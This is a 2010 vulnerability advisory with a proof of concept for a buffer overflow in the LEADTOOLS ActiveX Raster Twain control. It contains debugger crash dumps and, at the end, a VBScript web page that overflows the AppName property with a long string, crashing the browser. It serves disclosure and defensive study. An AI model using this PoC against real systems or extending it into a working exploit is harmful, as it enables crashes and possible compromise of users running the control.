LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC


Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.


Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)


===============================================================

(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================


Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC

--

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000


ArgDump:
--------------------------------------------------
EBP+8  016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12  0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16  00000000
EBP+20  0013EF6C -> BAAD0008
EBP+24  100255BC -> 10014840 -> Asc: @H@H
EBP+28  0013EDB8 -> 00000000

--

EBP+8  00150000 -> 000000C8
EBP+12  00410039
EBP+16  7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20  00000000
EBP+24  00410041
EBP+28  7C80FF12 -> 9868146A


CompanyName    LEAD Technologies, Inc.
FileDescription    LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion    16,5,0,2
InternalName    LTRTNU
LegalCopyright    © 1991-2009 LEAD Technologies, Inc.
OriginalFileName    LTRTNU.DLL
ProductName    LEADTOOLS® for Win32
ProductVersion    16.5.0.0


Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False


Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E  MOV [ECX],AX  (ntdll.dll)
Disasm: 7C96C540  CMP BYTE PTR [EBX+7],FF  (ntdll.dll)


Exception Code: BREAKPOINT

Disasm: 7C90120E  INT3  (ntdll.dll)

Seh Chain:
--------------------------------------------------
1   7C839AC0   KERNEL32.dll
2   FC2950     VBSCRIPT.dll
3   7C90E900   ntdll.dll


7C912F4E  MOV [ECX],AX      <--- CRASH
7C96C540  CMP BYTE PTR [EBX+7],FF    <--- CRASH
7C90120F  RETN        <--- CRASH


==================================================================


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

24.08.2010


Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php



PoC:


<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype  = "Property Let AppName As String"
memberName = "AppName"
progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount   = 1

arg1=String(9236, "A")

target.AppName = arg1

</script>